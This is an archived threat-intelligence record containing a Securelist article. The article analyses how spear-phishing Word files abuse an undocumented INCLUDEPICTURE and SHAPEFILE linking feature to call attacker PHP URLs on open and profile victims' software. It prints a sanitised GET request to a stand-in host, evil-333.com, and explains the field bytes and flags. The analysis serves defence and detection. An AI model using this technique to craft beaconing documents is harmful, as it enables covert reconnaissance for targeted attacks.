{
	"id": "b9b4c550-6131-4c10-9b76-1e8e34056c86",
	"created_at": "2026-04-06T00:15:34.573811Z",
	"updated_at": "2026-04-10T03:20:33.735606Z",
	"deleted_at": null,
	"sha1_hash": "260b952d46bdfbd3ab3f2cbac54f74e075f40598",
	"title": "An (un)documented Word feature abused by attackers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 114291,
	"plain_text": "An (un)documented Word feature abused by attackers\r\nBy Alexander Liskin\r\nPublished: 2017-09-18 · Archived: 2026-04-05 18:21:39 UTC\r\nA little while back we were investigating the malicious activities of the Freakyshelly targeted attack and came\r\nacross spear phishing emails that had some interesting documents attached to them. They were in OLE2 format\r\nand contained no macros, exploits or any other active content. However, a close inspection revealed that they\r\ncontained several links to PHP scripts located on third-party web resources. When we attempted to open these\r\nfiles in Microsoft Word, we found that the application addressed one of the links. As a result, the attackers\r\nreceived information about the software installed on the computer.\r\nWhat did the bad guys want with that information? Well, to ensure a targeted attack is successful, intelligence first\r\nneeds to be gathered, i.e. the bad guys need to find ways to reach prospective victims and collect information\r\nabout them. In particular, they need to know the operating system version and the version of some applications on\r\nthe victim computer, so they can send it the appropriate exploit.\r\nIn this specific case, the document looked like this:\r\nThere’s nothing suspicious about it at first glance – just a few tips about how to use Google search more\r\neffectively. 
The document contains no active content, no VBA macros, embedded Flash objects or PE files.\r\nHowever, when the user opens the document, Word sends the following GET request to one of the internal links.\r\nSo we opened the original document used in the attack, replaced the suspicious links with http://evil-*, and\r\nobtained the following:\r\nGET http://evil-333.com/cccccccccccc/ccccccccc/ccccccccc.php?cccccccccc HTTP/1.1\r\nAccept: */*\r\nhttps://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899\r\nPage 1 of 5\n\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727;\r\n.NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.2; MSOffice 12)\r\nAccept-Encoding: gzip, deflate\r\nHost: evil-333.com\r\nProxy-Connection: Keep-Alive\r\nThis code effectively sent information about the software installed on the victim machine to the attackers,\r\nincluding info about which version of Microsoft Office was installed. We decided to examine why Office followed\r\nthat link, and how these links can be identified in documents.\r\nInside a Word document\r\nThe first thing about the document that caught our eye was the INCLUDEPICTURE field containing one of the\r\nsuspicious links. However, as can be seen, that is not the link that Word addresses.\r\nAs a matter of fact, the data chunk seen in the fragment above contains the first and only piece of text in this\r\ndocument. The text in Word documents resides in the WordDocument stream in a ‘raw state’, i.e. it contains no\r\nformatting except so-called fields. The fields tell Word that a certain segment of the text must be presented in a\r\nspecific way; for example, it is thanks to these fields that we can see active links to other pages of the document,\r\nURL links, etc. 
The field INCLUDEPICTURE indicates that an image is attached to certain characters in the text.\r\nThe 0x13 byte (marked in red) in front of this field indicates that the ‘raw’ text ends there and a field description\r\nbegins. The description format is roughly as follows (according to [MS-DOC]: Word (.doc) Binary File Format):\r\nBegin = 0x13\r\nSep = 0x14\r\nEnd = 0x15\r\nField = \u003cBegin\u003e *\u003cField\u003e [Sep] *\u003cField\u003e \u003cEnd\u003e\r\nThe separator byte 0x14 is marked in yellow, and the field end byte 0x15 is shown inside the pink box.\r\nThe link to the image in the INCLUDEPICTURE field should be in ASCII format, but in this case it is in Unicode,\r\nso Word ignores the link. However, the separator byte 0x14 is followed by the byte 0x01 (shown in the green box)\r\nwhich indicates to the word processor that an image should be inserted at this point. The question is: how do we\r\nfind this image?\r\nThe characters and groups of characters within the text also possess properties; just like fields, these properties are\r\nresponsible for formatting (for example, they specify that a certain piece of text must be rendered in italics). The\r\nproperties of characters are stored in a two-level table within document streams under the names ‘xTable’ and\r\n‘Data’. We will not go into the complex details of how to analyze character properties, but as a result of this\r\nanalysis we can find the character properties from the offset 0x929 to 0x92C in the WordDocument stream:\r\nThis is the byte sequence with the picture placeholder 0x14 0x01 0x15. 
In the actual document, these bytes are\r\nlocated at offsets 0xB29 – 0xB2C, but the WordDocument stream begins with offset 0x200, and the character\r\noffsets are specified relative to its beginning.\r\nThe properties of the group of characters CP[2] indicate that an image is attached to them that is located in the\r\nData stream at offset 0:\r\n1FEF: prop[0]: 6A03 CPicLocation\r\n1FF1: value[0]: 00000000 ; character = 14\r\nWe arrive at this conclusion based on the fact that byte 0x01 is indicated in the INCLUDEPICTURE field’s value\r\n– this means the image should be located in the Data stream at the appropriate offset. If this value were different,\r\nthen it would have been necessary to look for the image in a different place or ignore this property.\r\nThis is where we stumbled on an undocumented feature. Microsoft Office documentation provides basically no\r\ndescription of the INCLUDEPICTURE field. This is all there is:\r\n0x43 INCLUDEPICTURE Specified in [ECMA-376] part 4, section 2.16.5.33.\r\nStandard ECMA-376 describes only that part of INCLUDEPICTURE that precedes the separator byte. It has no\r\ndescription of what the data that follows it may mean, and how it should be interpreted. This was the main\r\nproblem in understanding what was actually happening.\r\nSo, we go to offset 0 in the Data stream and see that the so-called SHAPEFILE form is located there:\r\nForms are described in a different Microsoft document: [MS-ODRAW]: Office Drawing Binary File Format. This\r\nform has a name and, in this case, it is another suspicious link:\r\nHowever, this is just an object name, so this link is not used in any way. 
While investigating this form further, let’s\r\nlook at the flags field (in the red box):\r\nThe value 0x0000000E resolves into a combination of three flags:\r\nmsoblipflagURL 0x00000002\r\nmsoblipflagDoNotSave 0x00000004\r\nmsoblipflagLinkToFile 0x00000008\r\nThis indicates that additional data should be attached to the form (it is highlighted in yellow in the screenshot),\r\nand that this data constitutes a URL that leads to the actual content of the form. Also, there is a ‘do not save’ flag,\r\nwhich prevents this content from being saved to the actual document when it is opened.\r\nIf we look at what this URL is, we see that it’s the actual link that Word follows when the document is opened:\r\nWe should note that besides Word for Windows, this ‘feature’ is also present in Microsoft Office for iOS and in\r\nMicrosoft Office for Android; LibreOffice and OpenOffice do not have it. If this document is opened in\r\nLibreOffice or OpenOffice, the malicious link is not called.\r\nThis is a complex mechanism that the bad guys have created to carry out profiling of potential victims for targeted\r\nattacks. In other words, they perform serious in-depth investigations in order to stay undetected while they carry\r\nout targeted attacks.\r\nKaspersky Lab’s security products are able to detect when the technique described in this article is used in\r\nMicrosoft Word documents, and to find links embedded in a document using the same technique.\r\nSource: https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899"
	],
	"report_names": [
		"81899"
	],
	"threat_actors": [],
	"ts_created_at": 1775434534,
	"ts_updated_at": 1775791233,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/260b952d46bdfbd3ab3f2cbac54f74e075f40598.pdf",
		"text": "https://archive.orkl.eu/260b952d46bdfbd3ab3f2cbac54f74e075f40598.txt",
		"img": "https://archive.orkl.eu/260b952d46bdfbd3ab3f2cbac54f74e075f40598.jpg"
	}
}